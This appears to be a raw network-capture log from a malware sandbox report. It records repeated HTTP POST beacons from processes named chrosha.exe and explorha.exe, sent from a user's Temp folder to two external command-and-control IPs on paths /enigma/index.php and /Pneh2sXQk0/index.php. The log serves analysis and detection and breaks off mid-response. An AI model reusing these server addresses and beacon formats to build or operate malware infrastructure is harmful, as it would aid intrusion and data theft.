Apr 19, 2024 03:31:19.788249016 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
295 | 192.168.2.5 | 50137 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:19.855314016 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:20.103374004 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
296 | 192.168.2.5 | 50138 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:20.032421112 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:20.276448965 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
297 | 192.168.2.5 | 50139 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:20.352876902 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:20.603303909 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
298 | 192.168.2.5 | 50140 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:20.628530025 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:31:20.870258093 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
299 | 192.168.2.5 | 50141 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:20.973072052 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:31:21.221287012 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
300 | 192.168.2.5 | 50142 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:21.125766993 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:21.378742933 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
301 | 192.168.2.5 | 50144 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:21.476008892 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:21.727442026 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
302 | 192.168.2.5 | 50145 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:21.745156050 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:31:21.990434885 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
303 | 192.168.2.5 | 50146 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:22.084155083 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:31:22.328073025 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
304 | 192.168.2.5 | 50147 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:22.243921995 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:22.496165037 CEST  196                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
305         192.168.2.5  50148        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp                            Bytes transferred  Direction  Data
Apr 19, 2024 03:31:22.582182884 CEST  309                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:22.839447975 CEST  196                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
306         192.168.2.5  50149        193.233.132.56  80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp                            Bytes transferred  Direction  Data
Apr 19, 2024 03:31:22.855777025 CEST  158                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:23.103256941 CEST  219                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
307         192.168.2.5  50150        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp                            Bytes transferred  Direction  Data
Apr 19, 2024 03:31:23.199419022 CEST  155                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:23.448077917 CEST  197                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
308         192.168.2.5  50151        193.233.132.56  80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp                            Bytes transferred  Direction  Data
Apr 19, 2024 03:31:23.361489058 CEST  312                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:23.613274097 CEST  196                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
309         192.168.2.5  50152        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp                            Bytes transferred  Direction  Data
Apr 19, 2024 03:31:23.704118967 CEST  309                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:23.960421085 CEST  196                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
310         192.168.2.5  50153        193.233.132.56  80                2956  C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp                            Bytes transferred  Direction  Data
Apr 19, 2024 03:31:23.978367090 CEST  158                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:31:24.226309061 CEST | Bytes transferred: 219 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID: 311 | Source IP: 192.168.2.5 | Source Port: 50154 | Destination IP: 193.233.132.167 | Destination Port: 80 | PID: 8024 | Process: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp: Apr 19, 2024 03:31:24.322788000 CEST | Bytes transferred: 155 | Direction: OUT | Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:31:24.569756985 CEST | Bytes transferred: 197 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID: 312 | Source IP: 192.168.2.5 | Source Port: 50155 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 4484 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp: Apr 19, 2024 03:31:24.479047060 CEST | Bytes transferred: 312 | Direction: OUT | Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Timestamp: Apr 19, 2024 03:31:24.727377892 CEST | Bytes transferred: 196 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 313 | Source IP: 192.168.2.5 | Source Port: 50156 | Destination IP: 193.233.132.167 | Destination Port: 80 | PID: 8024 | Process: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp: Apr 19, 2024 03:31:24.819403887 CEST | Bytes transferred: 309 | Direction: OUT | Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Timestamp: Apr 19, 2024 03:31:25.066776991 CEST | Bytes transferred: 196 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
